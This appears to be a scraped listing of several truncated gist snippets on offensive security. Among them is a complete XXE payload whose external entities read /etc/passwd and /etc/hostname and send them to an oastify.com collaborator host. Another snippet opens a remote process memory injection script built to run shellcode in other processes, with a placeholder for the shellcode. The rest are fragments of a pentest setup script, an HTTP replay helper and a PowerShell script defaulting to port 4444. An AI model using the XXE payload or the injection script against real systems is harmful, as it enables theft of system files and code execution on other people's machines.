This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| def send_http_request_from_file(file_path): | |
| with open(file_path, 'r') as file: | |
| lines = file.readlines() | |
| # Parse the first line to get the HTTP method and URL | |
| request_line = lines[0].strip() | |
| method, url = request_line.split(' ', 1) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % fileW SYSTEM "file:///etc/hostname"> | |
| <!ENTITY % fileL SYSTEM "file:///etc/passwd"> | |
| <!ENTITY % fileZ SYSTEM "file:///"> | |
| <!ENTITY % fileE SYSTEM "file://asdasdin/a"> | |
| <!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileW;'>"> | |
| <!ENTITY % evalq "<!ENTITY % exfiltrateq SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileL;'>"> | |
| <!ENTITY % evala "<!ENTITY % exfiltratea SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileZ;'>"> | |
| <!ENTITY % evale "<!ENTITY % exfiltratee SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileZ;'>"> | |
| %eval; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # ============================================================================== | |
| # Pentest Environment Setup Script | |
| # ============================================================================== | |
| set -eo pipefail | |
| # ββ ZSH: Backup & Go PATH ββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| cp ~/.zshrc ~/.zshrc_copy 2>/dev/null || true | |
| # Use escaped variables so .zshrc expands them at shell startup, not script time |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Remote Process Memory Injection | |
| # Doesn't work on every program | |
| # Tested with .NET programs (EarTrumpet, Greenshot) | |
| import sys | |
| from ctypes import * | |
| import psutil | |
| shellCode = b"Shell_code_here" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| param ($DPath, $DPort) | |
| if (!$DPath) | |
| { | |
| $DPath = '.' | |
| } | |
| if (!$DPort) | |
| { | |
| $DPort = '4444' |